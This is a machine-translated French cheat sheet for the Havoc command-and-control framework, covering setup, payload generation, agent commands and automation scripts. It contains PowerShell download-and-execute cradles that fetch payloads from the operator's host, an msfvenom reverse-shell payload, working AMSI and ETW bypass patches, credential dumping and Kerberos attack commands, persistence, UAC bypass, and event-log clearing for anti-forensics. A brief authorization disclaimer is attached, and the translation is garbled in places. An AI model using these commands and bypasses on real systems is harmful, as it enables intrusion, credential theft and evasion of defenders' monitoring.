Havoc C2 Cadre Feuille de chaleur
Aperçu général
Havoc est un cadre moderne et malléable de commandement et de contrôle (C2) conçu pour les opérations de l'équipe rouge en mettant l'accent sur la sécurité opérationnelle et l'évasion. Construit avec une architecture modulaire, Havoc fournit des capacités post-exploitation avancées, supporte plusieurs protocoles de communication, et offre des options de personnalisation étendues pour l'émulation adversaire sophistiquée.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser contre toute cible.
Installation
Préalables
# Install dependencies (Ubuntu/Debian)
sudo apt update
sudo apt install -y build-essential cmake pkg-config libssl-dev libpq-dev python3-dev python3-pip golang-go
# Install Qt5 development libraries
sudo apt install -y qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools
# Install Python dependencies
pip3 install --user PyQt5 requests
Construire à partir de la source
# Clone Havoc repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
# Build teamserver
cd teamserver
go mod download
make
# Build client
cd ../client
make
# Verify build
ls -la bin/
```_
### Installation Docker
```bash
# Clone repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
# Build Docker image
docker build -t havoc-teamserver -f teamserver/Dockerfile .
# Run teamserver container
docker run -d --name havoc-ts -p 40056:40056 -p 443:443 -p 80:80 havoc-teamserver
# Build client Docker image
docker build -t havoc-client -f client/Dockerfile .
# Run client container
docker run -it --name havoc-client -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix havoc-client
```_
### Installation de Kali Linux
```bash
# Install from Kali repositories (if available)
sudo apt update
sudo apt install havoc-c2
# Or build from source
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
sudo apt install -y build-essential cmake pkg-config libssl-dev qtbase5-dev
cd teamserver && make
cd ../client && make
Configuration
Configuration du serveur d'équipe
# teamserver/profiles/havoc.yaotl
Teamserver:
Host: "0.0.0.0"
Port: 40056
Build:
Compiler64: "/usr/bin/x86_64-w64-mingw32-gcc"
Compiler86: "/usr/bin/i686-w64-mingw32-gcc"
Nasm: "/usr/bin/nasm"
# SSL Configuration
Certs:
Cert: "data/x509-server.crt"
Key: "data/x509-server.key"
Operators:
- Name: "admin"
Password: "password123"
- Name: "operator1"
Password: "redteam2024"
Listeners:
- Name: "HTTP Listener"
Protocol: "Http"
Host: "192.168.1.100"
Port: 80
- Name: "HTTPS Listener"
Protocol: "Https"
Host: "secure.example.com"
Port: 443
Cert: "data/cert.pem"
Key: "data/key.pem"
Génération de certificats SSL
# Generate self-signed certificate
openssl req -new -x509 -keyout data/x509-server.key -out data/x509-server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=havoc-server"
# Generate certificate for HTTPS listener
openssl req -new -x509 -keyout data/cert.pem -out data/cert.pem -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
# Set proper permissions
chmod 600 data/*.key data/*.pem
Profil C2 malléable
# profiles/amazon.profile
set sample_name "Amazon";
set sleeptime "30000";
set jitter "20";
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36";
http-get \\\\{
set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
client \\\\{
header "Host" "www.amazon.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "Connection" "keep-alive";
metadata \\\\{
base64url;
parameter "field-keywords";
\\\\}
\\\\}
server \\\\{
header "Server" "Server";
header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVqZmduZXJlaGZ0b2VoZmQ=";
output \\\\{
netbios;
prepend "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">";
prepend "<html><head><title>Amazon.com: Online Shopping for Electronics, Apparel, Computers, Books, DVDs & more</title>";
append "</html>";
print;
\\\\}
\\\\}
\\\\}
http-post \\\\{
set uri "/N4215/adj/amzn.us.sr.aps";
client \\\\{
header "Host" "www.amazon.com";
header "Accept" "*/*";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "Content-Type" "text/xml";
header "Connection" "keep-alive";
id \\\\{
base64url;
parameter "sz";
\\\\}
output \\\\{
base64url;
parameter "tile";
\\\\}
\\\\}
server \\\\{
header "Server" "Server";
output \\\\{
netbios;
prepend "0";
append "";
print;
\\\\}
\\\\}
\\\\}
Utilisation de base
Démarrer Teamserver
# Start teamserver with default profile
cd teamserver
./teamserver -profile profiles/havoc.yaotl
# Start with custom profile
./teamserver -profile profiles/custom.yaotl
# Start with debug mode
./teamserver -profile profiles/havoc.yaotl -debug
# Start with specific bind address
./teamserver -profile profiles/havoc.yaotl -bind 0.0.0.0:40056
Connexion client
# Start Havoc client
cd client
./Havoc
# Connect to teamserver
1. Enter teamserver details:
- Host: 192.168.1.100
- Port: 40056
- Username: admin
- Password: password123
2. Click Connect
Interface Web
# Access web interface (if enabled)
https://192.168.1.100:40056/web
# Default credentials
Username: admin
Password: password123
Gestion de l'auditeur
Auditeur HTTP
# Create HTTP listener via GUI
1. Navigate to Listeners tab
2. Click "Add Listener"
3. Configure parameters:
- Name: HTTP-80
- Protocol: HTTP
- Host: 192.168.1.100
- Port: 80
- User Agent: Mozilla/5.0...
- Headers: Custom headers
# Via configuration file
Listeners:
- Name: "HTTP Listener"
Protocol: "Http"
Host: "192.168.1.100"
Port: 80
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Headers:
- "Accept: text/html,application/xhtml+xml"
- "Accept-Language: en-US,en;q=0.9"
Auditeur HTTPS
# Create HTTPS listener
1. Navigate to Listeners tab
2. Click "Add Listener"
3. Configure parameters:
- Name: HTTPS-443
- Protocol: HTTPS
- Host: secure.example.com
- Port: 443
- Certificate: /path/to/cert.pem
- Private Key: /path/to/key.pem
- User Agent: Custom UA string
# Advanced HTTPS configuration
Listeners:
- Name: "HTTPS Listener"
Protocol: "Https"
Host: "secure.example.com"
Port: 443
Cert: "certs/server.crt"
Key: "certs/server.key"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Secure: true
HSTS: true
SMB Auditeur
# Create SMB listener for lateral movement
1. Navigate to Listeners tab
2. Click "Add Listener"
3. Configure parameters:
- Name: SMB-445
- Protocol: SMB
- Named Pipe: \\.\pipe\msagent_##
- Host: 192.168.1.100
- Port: 445
# SMB configuration
Listeners:
- Name: "SMB Listener"
Protocol: "Smb"
PipeName: "msagent_ab"
Host: "192.168.1.100"
Port: 445
Génération de charge utile
Agent démon (Windows)
# Generate Demon payload via GUI
1. Navigate to Payloads tab
2. Click "Generate Payload"
3. Configure parameters:
- Agent: Demon
- Listener: HTTP-80
- Architecture: x64
- Format: Windows Executable
- Indirect Syscalls: Enabled
- Sleep Obfuscation: Enabled
# Advanced Demon configuration
Payload:
Agent: "Demon"
Listener: "HTTP-80"
Arch: "x64"
Format: "Windows Executable"
Config:
Sleep: 5
Jitter: 20
IndirectSyscalls: true
SleepObfuscation: true
ProxyLoading: true
AmsiBypass: true
EtwBypass: true
Génération de Shellcode
# Generate shellcode
1. Navigate to Payloads tab
2. Select "Generate Payload"
3. Configure parameters:
- Agent: Demon
- Listener: HTTPS-443
- Format: Shellcode (bin)
- Architecture: x64
- Obfuscation: Enabled
# Use generated shellcode
# Inject into process
# Use with custom loaders
# Integrate with other frameworks
Charge utile PowerShell
# Generate PowerShell payload
1. Navigate to Payloads tab
2. Select "Generate Payload"
3. Configure parameters:
- Agent: Demon
- Listener: HTTP-80
- Format: PowerShell
- Obfuscation: Enabled
# Generated PowerShell example
$s='192.168.1.100';$p=80;$u='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
$wc=New-Object System.Net.WebClient;$wc.Headers.Add('User-Agent',$u);
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
$k=$wc.DownloadData("http://$s:$p/");IEX([System.Text.Encoding]::ASCII.GetString($k));
# Execute on target
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')"
DLL Charge utile
# Generate DLL payload
1. Navigate to Payloads tab
2. Select "Generate Payload"
3. Configure parameters:
- Agent: Demon
- Listener: HTTPS-443
- Format: Windows DLL
- Architecture: x64
- Export Function: DllMain
# Load DLL on target
rundll32.exe payload.dll,DllMain
# Or via PowerShell
[System.Reflection.Assembly]::LoadFile("C:\path\to\payload.dll")
Gestion des agents
Commandements des agents démons
# Basic system information
whoami # Current user context
hostname # Computer name
pwd # Current directory
ls # List directory contents
cd [path] # Change directory
cat [file] # Read file contents
ps # List processes
env # Environment variables
# File operations
download [file] # Download file from target
upload [local] [remote] # Upload file to target
mkdir [directory] # Create directory
rm [file] # Remove file
cp [source] [dest] # Copy file
mv [source] [dest] # Move file
Gestion des processus
# Process operations
ps # List all processes
ps -u [user] # List processes by user
kill [pid] # Terminate process
killall [name] # Kill processes by name
# Process injection
inject [pid] [shellcode] # Inject shellcode into process
hollowing [target] [payload] # Process hollowing
doppelganging [target] [payload] # Process doppelganging
# Token manipulation
steal_token [pid] # Steal process token
make_token [user] [pass] [domain] # Create new token
rev2self # Revert to original token
Opérations liées aux titres de créance
# Credential harvesting
mimikatz [command] # Execute Mimikatz commands
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
sam # Dump SAM database
cache # Dump cached credentials
# Kerberos attacks
kerberoast # Kerberoasting attack
asreproast # AS-REP roasting
dcsync [user] # DCSync attack
golden [options] # Golden ticket creation
silver [options] # Silver ticket creation
Mouvement latéral
# Remote execution
psexec [target] [command] # PSExec execution
wmiexec [target] [command] # WMI execution
smbexec [target] [command] # SMB execution
winrm [target] [command] # WinRM execution
# Credential-based movement
pth [hash] [target] [command] # Pass-the-hash
ptk [ticket] [target] [command] # Pass-the-ticket
# Service manipulation
sc [target] create [service] [binary] # Create service
sc [target] start [service] # Start service
sc [target] stop [service] # Stop service
sc [target] delete [service] # Delete service
Caractéristiques avancées
SOCKS Proxy
# Start SOCKS proxy
socks start [port] # Start SOCKS4/5 proxy on port
socks list # List active SOCKS proxies
socks stop [id] # Stop SOCKS proxy
# Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24
proxychains firefox
proxychains msfconsole
Transfert de port
# Local port forwarding
portfwd add [local_port] [remote_host] [remote_port]
portfwd list # List active port forwards
portfwd remove [id] # Remove port forward
# Reverse port forwarding
rportfwd add [remote_port] [local_host] [local_port]
rportfwd list # List reverse port forwards
rportfwd remove [id] # Remove reverse port forward
Mécanismes de persistance
# Registry persistence
persist registry [key] [value] [payload] # Registry autorun
persist startup [name] [payload] # Startup folder
persist service [name] [payload] # Windows service
# Scheduled task persistence
persist schtask [name] [trigger] [payload] # Scheduled task
persist wmi [filter] [consumer] [payload] # WMI event subscription
# Advanced persistence
persist com [clsid] [payload] # COM hijacking
persist dll [target] [payload] # DLL hijacking
Escalade des privilèges
# UAC bypass techniques
uacbypass [method] [payload] # Various UAC bypass methods
eventvwr [payload] # Event Viewer UAC bypass
fodhelper [payload] # FodHelper UAC bypass
computerdefaults [payload] # Computer Defaults UAC bypass
# Kernel exploits
exploit ms16-032 [payload] # Secondary Logon Handle EoP
exploit ms16-135 [payload] # Windows Kernel-Mode Drivers EoP
exploit cve-2021-1675 [payload] # PrintNightmare
Exfiltration des données
# File exfiltration
exfil http [file] [url] # HTTP exfiltration
exfil dns [file] [domain] # DNS exfiltration
exfil smb [file] [share] # SMB exfiltration
# Database exfiltration
exfil sql [connection] [query] # SQL database exfiltration
exfil ldap [server] [query] # LDAP exfiltration
# Steganography
exfil stego [file] [image] # Hide data in image
exfil stego [file] [audio] # Hide data in audio
Techniques d'évacuation
Dépassement AMSI
// AMSI bypass implementation in Demon
public static void BypassAMSI()
\\\\{
try
\\\\{
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBuffer = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBuffer, patch.Length);
VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch (Exception ex)
\\\\{
// Handle exception
\\\\}
\\\\}
ETW Dépassement
// ETW bypass implementation
public static void BypassETW()
\\\\{
try
\\\\{
var ntdll = LoadLibrary("ntdll.dll");
var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch (Exception ex)
\\\\{
// Handle exception
\\\\}
\\\\}
Obfusation du sommeil
// Sleep obfuscation in Demon agent
void SleepObfuscation(DWORD dwMilliseconds)
\\\\{
CONTEXT ctx = \\\\{ 0 \\\\};
HANDLE hTimer = NULL;
LARGE_INTEGER liDueTime = \\\\{ 0 \\\\};
// Create waitable timer
hTimer = CreateWaitableTimer(NULL, TRUE, NULL);
if (!hTimer) return;
// Set timer
liDueTime.QuadPart = -10000LL * dwMilliseconds;
SetWaitableTimer(hTimer, &liDueTime, 0, NULL, NULL, FALSE);
// Encrypt agent in memory
EncryptAgent();
// Wait for timer
WaitForSingleObject(hTimer, INFINITE);
// Decrypt agent
DecryptAgent();
CloseHandle(hTimer);
\\\\}
Syscalls indirects
; Indirect syscall implementation
.code
IndirectSyscall PROC
mov r10, rcx
mov eax, edx
jmp qword ptr [r8]
IndirectSyscall ENDP
; Usage in C
NTSTATUS IndirectNtAllocateVirtualMemory(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
)
\\\\{
return IndirectSyscall(ProcessHandle, 0x18, SyscallAddress);
\\\\}
Automatisation et écriture
Automatisation Python
# Havoc automation script
import requests
import json
import time
class HavocAPI:
def __init__(self, host, port, username, password):
self.base_url = f"https://\\\\{host\\\\}:\\\\{port\\\\}/api"
self.session = requests.Session()
self.session.verify = False
self.authenticate(username, password)
def authenticate(self, username, password):
auth_data = \\\\{
"username": username,
"password": password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json()["token"]
self.session.headers.update(\\\\{"Authorization": f"Bearer \\\\{self.token\\\\}"\\\\})
def get_demons(self):
response = self.session.get(f"\\\\{self.base_url\\\\}/demons")
return response.json()
def execute_command(self, demon_id, command):
task_data = \\\\{
"demon_id": demon_id,
"command": command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/tasks", json=task_data)
return response.json()
def automated_recon(self, demon_id):
"""Automated reconnaissance on new demon"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"netstat -an",
"ipconfig /all",
"systeminfo"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(demon_id, cmd)
time.sleep(2)
# Credential harvesting if elevated
if self.is_elevated(demon_id):
self.execute_command(demon_id, "mimikatz logonpasswords")
# Usage
havoc = HavocAPI("192.168.1.100", 40056, "admin", "password123")
demons = havoc.get_demons()
for demon in demons:
if demon["status"] == "active":
havoc.automated_recon(demon["id"])
Automatisation PowerShell
# PowerShell automation for Havoc
function Invoke-HavocAutomation \\\\{
param(
[string]$HavocServer = "192.168.1.100",
[int]$Port = 40056,
[string]$Username = "admin",
[string]$Password = "password123"
)
# Authenticate to Havoc API
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
$authResponse = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/auth" -Method POST -Body $authData -ContentType "application/json" -SkipCertificateCheck
$token = $authResponse.token
$headers = @\\\\{
"Authorization" = "Bearer $token"
"Content-Type" = "application/json"
\\\\}
# Get active demons
$demons = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/demons" -Headers $headers -SkipCertificateCheck
foreach ($demon in $demons) \\\\{
if ($demon.status -eq "active") \\\\{
Write-Host "[+] Processing demon: $($demon.id)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "ps", "netstat -an")
foreach ($cmd in $commands) \\\\{
$taskData = @\\\\{
demon_id = $demon.id
command = $cmd
\\\\}|ConvertTo-Json
Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/tasks" -Method POST -Body $taskData -Headers $headers -SkipCertificateCheck
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\\\}
# Execute automation
Invoke-HavocAutomation
Automatisation des billets
#!/bin/bash
# Havoc automation script
HAVOC_SERVER="192.168.1.100"
HAVOC_PORT="40056"
USERNAME="admin"
PASSWORD="password123"
# Authenticate and get token
TOKEN=$(curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/auth" \
-H "Content-Type: application/json" \
-d "\\\\{\"username\":\"$USERNAME\",\"password\":\"$PASSWORD\"\\\\}"|\
jq -r '.token')
# Function to execute command on demon
execute_command() \\\\{
local demon_id=$1
local command=$2
curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/tasks" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"demon_id\":\"$demon_id\",\"command\":\"$command\"\\\\}"
\\\\}
# Get active demons
DEMONS=$(curl -s -k -H "Authorization: Bearer $TOKEN" \
"https://$HAVOC_SERVER:$HAVOC_PORT/api/demons"|\
jq -r '.[]|select(.status=="active")|.id')
# Execute commands on each demon
for demon_id in $DEMONS; do
echo "[+] Processing demon: $demon_id"
# Reconnaissance commands
commands=("whoami" "hostname" "ps" "netstat -an" "ipconfig")
for cmd in "$\\\\{commands[@]\\\\}"; do
echo "[+] Executing: $cmd"
execute_command "$demon_id" "$cmd"
sleep 2
done
done
Intégration avec d'autres outils
Intégration des métadonnées
# Use Havoc with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Havoc demon
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
shell C:\Windows\Temp\update.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Intégration de la grève du cobalt
# Beacon integration
# Generate Cobalt Strike beacon
# Use Havoc for initial access, pivot to Beacon
# From Havoc demon
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Intégration de BloodHound
# Collect BloodHound data via Havoc
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
# Run BloodHound collection
shell C:\Windows\Temp\collector.exe -c All -d domain.local
# Download collected data
download C:\Windows\Temp\*BloodHound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
Sécurité opérationnelle
Sécurité des communications
# Domain fronting configuration
# Configure CDN (CloudFlare, AWS CloudFront)
# Set up domain fronting rules
# Update listener configuration
# Certificate management
# Use legitimate SSL certificates
# Implement certificate pinning
# Regular certificate rotation
Obfuscation de la circulation
# Malleable C2 profiles
# Mimic legitimate applications
# Use realistic timing and jitter
# Implement traffic shaping
# Custom user agents
# Match target environment
# Use legitimate application signatures
# Implement user agent rotation
Anti-forensiques
# Event log clearing
shell wevtutil cl System
shell wevtutil cl Security
shell wevtutil cl Application
# Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Memory cleanup
# Implement secure memory wiping
# Use process migration
# Clear command history
Dépannage
Questions communes
# Demon not connecting
1. Check firewall rules
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# SSL certificate issues
# Regenerate certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Performance issues
# Increase demon sleep time
# Optimize task execution
# Use multiple listeners
Mode de débogage
# Enable debug logging
./teamserver -profile profiles/havoc.yaotl -debug
# Check logs
tail -f logs/teamserver.log
# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolution
Questions relatives aux bases de données
# Reset database
rm -rf data/havoc.db
./teamserver -profile profiles/havoc.yaotl
# Backup database
cp data/havoc.db data/havoc.db.backup
# Restore database
cp data/havoc.db.backup data/havoc.db
Meilleures pratiques
Planification opérationnelle
- **Configurer les profils et les auditeurs avant l'engagement
- Coordination de l'équipe: Utiliser la gestion de l'opérateur pour la collaboration d'équipe
- ** Protocoles de communication** : Établir des canaux de communication C2 clairs
- ** Traitement des données** : Mettre en œuvre une collecte et une infiltration de données sécurisées
- Procédures de nettoyage: Plan d'enlèvement des artefacts et de nettoyage opérationnel
Considérations en matière de sécurité
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent configurations
# Implement kill dates
# Regular agent rotation
# Secure communication channels
Documentation et rapports
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Ressources
- [Dépôt Havoc GitHub] (LINK_5)
- Documentation de havoc
- [Havoc Discorde communautaire] (LINK_5)
- [Entraînement de l'équipe rouge du village Havoc] (LINK_5)
- Opérations de l'équipe rouge SANS
*Cette feuille de triche fournit une référence complète pour l'utilisation du cadre Havoc C2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer les opérations de l'équipe rouge ou les tests de pénétration. *